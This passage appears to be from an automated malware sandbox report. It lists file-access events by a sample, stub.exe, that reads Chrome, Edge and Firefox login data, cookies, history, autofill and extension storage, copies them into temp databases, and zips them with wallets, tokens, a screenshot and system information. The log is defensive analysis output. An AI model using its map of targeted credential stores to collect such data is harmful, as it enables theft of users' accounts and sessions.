                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2023.9.4.1\_metadata VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231005.1.0 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231006.1.0 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent\1.0.0.5 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\bookmarkbackups VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\events VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\security_state VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.files VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\to-be-removed VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Logins.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Logins.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Web.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Web.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Cookies.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Cookies.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\HistoryData.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\HistoryData.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DownloadData.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DownloadData.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AutofillData.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AutofillData.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Games VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\screenshot.png VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\screenshot.png VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\process_info.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Firefox\History.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Cookies.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\system_info.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\network_info.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Sessions VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Tokens VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Wallets VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\network_info.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\network_info.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\network_info.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\process_info.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\process_info.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\process_info.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\screenshot.png VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\screenshot.png VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\screenshot.png VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\system_info.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Firefox VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Cookies.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Cookies.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Cookies.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Firefox VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67\Browsers\Firefox\History.txt VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67.zip VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9AC52742-8547-84D6-5349-ECEC87A66D67.zip VolumeInformationJump to behavior
                  Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
